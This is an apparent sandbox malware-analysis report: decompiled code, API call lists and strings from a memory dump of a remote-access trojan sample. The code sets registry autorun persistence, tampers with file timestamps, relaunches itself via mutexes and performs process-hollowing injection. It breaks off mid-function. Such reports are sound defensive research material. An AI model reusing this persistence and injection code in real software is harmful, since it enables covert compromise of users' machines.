									E00C888D0(0x80000002,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a, 2, E00C82E48( *((intOrPtr*)(_t305 - 0x14))) + _t234, 0,  *((intOrPtr*)(_t305 - 0x14)));
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f2)) == 1) {
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f3)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t215, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t224, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f4)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t199, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t207, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f5)) == 1) {
										E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t185, 0,  *((intOrPtr*)(_t305 - 0x18)));
										E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t191, 0,  *((intOrPtr*)(_t305 - 0x18)));
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f6)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t169, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t178, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
								}
							}
						} while (E00C835B0( *((intOrPtr*)(_t305 + 8)) + 0x181c) != 0 || E00C834C4( *((intOrPtr*)(_t305 + 8)) + 0x1a26) == 0);
						if( *((intOrPtr*)(_t305 - 0xc)) != 0) {
							if(__eflags <= 0) {
								goto L24;
							}
							L23:
							E00C83218( *((intOrPtr*)(_t305 + 8)) + 0x181c,  *((intOrPtr*)(_t305 - 4)),  *((intOrPtr*)(_t305 - 0x10)),  *((intOrPtr*)(_t305 - 0xc)));
							goto L24;
						}
						if( *((intOrPtr*)(_t305 - 0x10)) <= 0) {
							goto L24;
						}
						goto L23;
						L24:
					} while ( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1235)) != 1);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x1a26, 0x80);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x181c, 0x80);
					E00C81248();
					_push(_t305);
					_push(0xc89399);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t121 = E00C812A4(6);
					_pop(_t259);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x1a26, _t257, _t259, _t121 + 0x7d1);
					_pop(_t278);
					 *[fs:eax] = _t278;
				}
			}

0x00c8939e
0x00c893a3
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89428
0x00c89435
0x00c89435
0x00c8943a
0x00c8943a
0x00c8943a
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00c88ffa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00c890d9
0x00c892a8
0x00c892c9
0x00c892d3
0x00000000
0x00000000
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892eb
0x00c892ee
0x00c89309
0x00c8931c
0x00c89321
0x00c89328
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c89394

APIs

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00C80000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
StubPath, xrefs: 00C890B7
Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
open, xrefs: 00C8946F
Load, xrefs: 00C89181, 00C891B3
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
Shell, xrefs: 00C891E7, 00C8920F

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C8941B, Relevance: 31.9, APIs: 9, Strings: 9, Instructions: 356
sleepCrypto

C-Code - Quality: 58%

			E00C8941B() {
				void* _t121;
				void* _t143;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t262;
				intOrPtr _t278;
				intOrPtr _t281;
				void* _t305;
				intOrPtr _t306;

				E00C814F0();
				while(1) {
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x1a26);
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x181c);
					goto L28;
					do {
						do {
							L28:
							_t258 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1310);
							if(GetLastError() == 0xb7) {
								CloseHandle(_t258);
							} else {
								CloseHandle(_t258);
								ShellExecuteW(0, L"open",  *((intOrPtr*)(_t305 + 8)) + 0x181c, 0, 0, 0);
							}
							_t257 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1326);
							if(GetLastError() != 0xb7) {
								CloseHandle(_t257);
							} else {
								ExitProcess(0);
							}
							Sleep(0x1388);
							if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1258)) == 1) {
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d8)) == 1) {
									E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t252, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d9)) == 1) {
									E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t243, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12da)) == 1) {
									SHDeleteKeyW(0x80000001,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a);
									E00C888D0(0x80000002,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a, 2, E00C82E48( *((intOrPtr*)(_t305 - 0x14))) + _t234, 0,  *((intOrPtr*)(_t305 - 0x14)));
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f2)) == 1) {
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f3)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t215, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t224, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f4)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t199, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t207, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f5)) == 1) {
										E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t185, 0,  *((intOrPtr*)(_t305 - 0x18)));
										E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48( *((intOrPtr*)(_t305 - 0x18))) + _t191, 0,  *((intOrPtr*)(_t305 - 0x18)));
									}
									if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12f6)) == 1) {
										E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t169, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
										E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t178, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
									}
								}
							}
						} while (E00C835B0( *((intOrPtr*)(_t305 + 8)) + 0x181c) != 0 || E00C834C4( *((intOrPtr*)(_t305 + 8)) + 0x1a26) == 0);
						if( *((intOrPtr*)(_t305 - 0xc)) != 0) {
							if(__eflags <= 0) {
								goto L24;
							}
							L23:
							E00C83218( *((intOrPtr*)(_t305 + 8)) + 0x181c,  *((intOrPtr*)(_t305 - 4)),  *((intOrPtr*)(_t305 - 0x10)),  *((intOrPtr*)(_t305 - 0xc)));
							goto L24;
						}
						if( *((intOrPtr*)(_t305 - 0x10)) <= 0) {
							goto L24;
						}
						goto L23;
						L24:
					} while ( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1235)) != 1);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x1a26, 0x80);
					SetFileAttributesW( *((intOrPtr*)(_t305 + 8)) + 0x181c, 0x80);
					E00C81248();
					_push(_t305);
					_push(0xc89399);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t121 = E00C812A4(6);
					_pop(_t259);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x1a26, _t257, _t259, _t121 + 0x7d1);
					_pop(_t278);
					 *[fs:eax] = _t278;
					_push(_t305);
					_push(0xc89416);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t143 = E00C812A4(6);
					_pop(_t262);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x181c, _t257, _t262, _t143 + 0x7d1);
					_pop(_t281);
					 *[fs:eax] = _t281;
				}
			}

0x00c8941b
0x00c89420
0x00c89428
0x00c89435
0x00c89435
0x00c8943a
0x00c8943a
0x00c8943a
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00c88ffa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00c890d9
0x00c892a8
0x00c892c9
0x00c892d3
0x00000000
0x00000000
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892eb
0x00c892ee
0x00c89309
0x00c8931c
0x00c89321
0x00c89328
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89411

APIs

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00C80000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
StubPath, xrefs: 00C890B7
Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
open, xrefs: 00C8946F
Load, xrefs: 00C89181, 00C891B3
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
Shell, xrefs: 00C891E7, 00C8920F

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C84600, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223
injectionthreadprocess

C-Code - Quality: 68%

			E00C84600(long __eax, void** __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				char _v9;
				void _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v92;
				long _v256;
				long _v260;
				void* _v288;
				intOrPtr _v300;
				signed short _v334;
				void* _v340;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				long _v372;
				void* _v380;
				struct _PROCESS_INFORMATION _v396;
				struct _CONTEXT _v668;
				int _t80;
				void* _t81;
				int _t113;
				int _t119;
				long _t149;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t171;
				signed int _t172;
				void** _t173;
				void* _t175;
				void* _t176;
				intOrPtr* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;

				_t173 = __ecx;
				_v8 = __edx;
				_t149 = __eax;
				_t171 = _a4;
				 *((intOrPtr*)(__ecx)) = 0;
				_v9 = 0;
				_push(0xc848a9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t178;
				E00C81284( &(_v668.ExtendedRegisters), 0x44);
				E00C81284( &_v396, 0x10);
				E00C81284( &_v668, 0xcc);
				_v668.ExtendedRegisters.cb = 0x44;
				_v668.ContextFlags = 0x10007;
				E00C845F0();
				_t167 = _t149 + _v32;
				E00C845F0();
				if(_t171 == 0) {
					_t80 = CreateProcessW(0, _v8, 0, 0, 0, 4, 0, 0,  &(_v668.ExtendedRegisters),  &_v396);
					asm("sbb eax, eax");
					_t81 = _t80 + 1;
				} else {
					_t167 = _t171;
					E00C82914( &_v396, _t167);
					_t81 = 1;
				}
				if(_t81 == 1) {
					 *_t173 = _v396.hProcess;
					Sleep(0xc8);
					GetThreadContext(_v396.hThread,  &_v668);
					ReadProcessMemory(_v396.hProcess, _v668.Ebx + 8,  &_v24, 4,  &_v20);
					NtUnmapViewOfSection(_v396.hProcess,  &_v24);
					_v16 = VirtualAllocEx(_v396.hProcess, _v288, _v260, 0x3000, 4);
					WriteProcessMemory(_v396.hProcess, _v16, _t149, _v256,  &_v20);
					_v28 = _v32 + 0xf8;
					_t175 = (_v334 & 0x0000ffff) - 1;
					if(_t175 >= 0) {
						_t176 = _t175 + 1;
						_t172 = 0;
						do {
							asm("cdq");
							_push(_t167);
							_push(_t149);
							asm("adc edx, [esp+0x4]");
							_t179 = _t178 + 8;
							_push(0);
							_push(_v28 +  *_t178);
							asm("cdq");
							asm("adc edx, [esp+0x4]");
							_t180 = _t179 + 8;
							E00C845F0();
							_push( &_v20);
							_push(_v364);
							asm("cdq");
							_t167 = 0;
							asm("adc edx, [esp+0x4]");
							_t178 = _t180 + 8;
							WriteProcessMemory(_v396.hProcess, _v16 + _v368, _v360 +  *_t180, _t149, (_t172 << 3) + (_t172 << 3) * 4 +  *_t179);
							VirtualProtectEx(_v396.hProcess, _v16 + _v368, _v372, 0x40,  &_v24);
							_t172 = _t172 + 1;
							_t176 = _t176 - 1;
						} while (_t176 != 0);
					}
					_t113 = WriteProcessMemory(_v396, _v668.Ebx + 8,  &_v16, 4,  &_v20);
					asm("sbb eax, eax");
					_v9 = _t113 + 1;
					_v668.Eax = _v16 + _v300;
					if(_v9 == 1) {
						_t119 = SetThreadContext(_v396.hThread,  &_v668);
						asm("sbb eax, eax");
						_v9 = _t119 + 1;
						ResumeThread(_v396.hThread);
					}
				}
				_pop(_t168);
				 *[fs:eax] = _t168;
				return 0;
			}

0x00c8460c
0x00c8460e
0x00c84611
0x00c84613
0x00c84618
0x00c8461a
0x00c84621
0x00c84626
0x00c84629
0x00c84639
0x00c8464b
0x00c8465d
0x00c84662
0x00c8466c
0x00c84680
0x00c84687
0x00c84695
0x00c8469c
0x00c846d4
0x00c846dc
0x00c846de
0x00c8469e
0x00c846a9
0x00c846ab
0x00c846b0
0x00c846b0
0x00c846e1
0x00c846ed
0x00c846f4
0x00c84707
0x00c84727
0x00c84737
0x00c8475d
0x00c84777
0x00c84784
0x00c8478e
0x00c84791
0x00c84797
0x00c84798
0x00c8479a
0x00c8479c
0x00c8479d
0x00c8479e
0x00c847a7
0x00c847ab
0x00c847ae
0x00c847af
0x00c847b8
0x00c847bc
0x00c847c0
0x00c847d0
0x00c847d8
0x00c847df
0x00c847e2
0x00c847eb
0x00c847f0
0x00c847f4
0x00c84809
0x00c8482c
0x00c84831
0x00c84832
0x00c84832
0x00c8479a
0x00c84854
0x00c8485c
0x00c8485f
0x00c8486b
0x00c84875
0x00c84885
0x00c8488d
0x00c84890
0x00c8489a
0x00c8489a
0x00c84875
0x00c848a1
0x00c848a4
0x00c848d8

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
GetThreadContext.KERNEL32(?,?), ref: 00C84707
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
SetThreadContext.KERNEL32(?,?), ref: 00C84885
ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Strings

D, xrefs: 00C84662

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C83A54, Relevance: 12.1, APIs: 8, Instructions: 68

C-Code - Quality: 70%

			E00C83A54(WCHAR* __eax, intOrPtr* __edx) {
				short _v543;
				intOrPtr _v571;
				char _v575;
				void* _v579;
				struct tagPROCESSENTRY32W* _t9;
				WCHAR* _t16;
				void* _t17;
				WCHAR* _t26;
				void* _t27;
				WCHAR* _t29;
				void* _t30;
				void* _t31;
				void* _t34;
				void* _t35;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr* _t38;

				_t36 = __edx;
				_t29 = __eax;
				_t37 = CreateToolhelp32Snapshot(2, 0);
				_v575 = 0x22c;
				_t9 =  &_v575;
				Process32FirstW(_t37, _t9);
				 *_t36 = 0;
				 *_t38 = 0;
				while(_t9 != 0) {
					_push(E00C82E48(_t29) + _t11);
					_push(CharUpperW(_t29));
					_t16 = CharUpperW(E00C83988( &_v543, __eflags));
